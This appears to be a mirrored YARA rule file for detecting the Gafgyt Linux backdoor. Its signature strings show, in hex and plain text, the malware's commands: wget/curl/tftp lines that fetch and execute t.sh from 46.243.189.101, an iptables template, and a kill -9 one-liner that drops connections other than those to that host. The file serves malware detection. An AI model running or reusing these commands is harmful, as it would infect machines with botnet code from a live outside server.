qwqdanchun
/
DefenderYara
mirror of https://github.com/qwqdanchun/DefenderYara.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
DefenderYara/Backdoor/Linux/Gafgyt/Backdoor_Linux_Gafgyt_F_xp.yar

14 lines
2.3 KiB
Plaintext
Raw Blame History

rule Backdoor_Linux_Gafgyt_F_xp{
meta:
description = "Backdoor:Linux/Gafgyt.F!xp,SIGNATURE_TYPE_ELFHSTR_EXT,03 00 03 00 04 00 00 03 00 "
strings :
$a_00_0 = {77 67 65 74 20 68 74 74 70 3a 2f 2f 34 36 2e 32 34 33 2e 31 38 39 2e 31 30 31 2f 74 2e 73 68 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 36 2e 32 34 33 2e 31 38 39 2e 31 30 31 2f 74 2e 73 68 3b 20 63 75 72 6c 20 2d 4f 20 68 74 74 70 3a 2f 2f 34 36 2e 32 34 33 2e 31 38 39 2e 31 30 31 2f 74 2e 73 68 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 2e 73 68 3b 20 73 68 20 74 2e 73 68 3b 20 74 66 74 70 20 34 36 2e 32 34 33 2e 31 38 39 2e 31 30 31 20 2d 63 20 67 65 74 20 74 74 2e 73 68 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 74 2e 73 68 } //01 00 wget http://46.243.189.101/t.sh; /bin/busybox wget http://46.243.189.101/t.sh; curl -O http://46.243.189.101/t.sh; chmod 777 t.sh; sh t.sh; tftp 46.243.189.101 -c get tt.sh; chmod 777 tt.sh
$a_00_1 = {25 73 20 69 70 74 61 62 6c 65 73 20 2d 41 20 49 4e 50 55 54 20 2d 70 20 25 73 20 2d 2d 64 65 73 74 69 6e 61 74 69 6f 6e 2d 70 6f 72 74 20 25 73 20 2d 6a } //02 00 %s iptables -A INPUT -p %s --destination-port %s -j
$a_00_2 = {6b 69 6c 6c 20 2d 39 20 60 6e 65 74 73 74 61 74 20 2d 70 20 2d 74 20 7c 20 67 72 65 70 20 22 45 53 54 41 42 4c 49 53 48 45 44 22 20 7c 20 67 72 65 70 20 2d 76 20 22 45 53 54 41 42 4c 49 53 48 45 44 20 2d 22 20 7c 20 67 72 65 70 20 2d 76 20 22 34 36 2e 32 34 33 2e 31 38 39 2e 31 30 31 22 20 7c 20 67 72 65 70 20 2d 76 20 22 3a 35 35 35 35 22 20 7c 20 67 72 65 70 20 2d 76 20 22 3a 35 35 35 36 22 7c 20 61 77 6b 20 7b 27 70 72 69 6e 74 20 24 37 7d 27 20 7c 20 61 77 6b 20 2d 46 20 27 2f 27 20 7b 27 70 72 69 6e 74 20 24 31 27 7d 60 } //02 00 kill -9 `netstat -p -t | grep "ESTABLISHED" | grep -v "ESTABLISHED -" | grep -v "46.243.189.101" | grep -v ":5555" | grep -v ":5556"| awk {'print $7}' | awk -F '/' {'print $1'}`
$a_00_3 = {2f 74 6d 70 2f 74 2e 73 68 3b 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 74 2e 73 68 3b 20 2f 74 6d 70 2f 74 2e 73 68 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 36 2e 32 34 33 2e 31 38 39 2e 31 30 31 2f 74 2e 73 68 20 2d 4f 20 2d 20 3e 20 2f 74 6d 70 2f 74 2e 73 68 } //00 00 /tmp/t.sh; chmod 777 /tmp/t.sh; /tmp/t.sh; /bin/busybox wget http://46.243.189.101/t.sh -O - > /tmp/t.sh
condition:
any of ($a_*)
}
Reference in New Issue View Git Blame Copy Permalink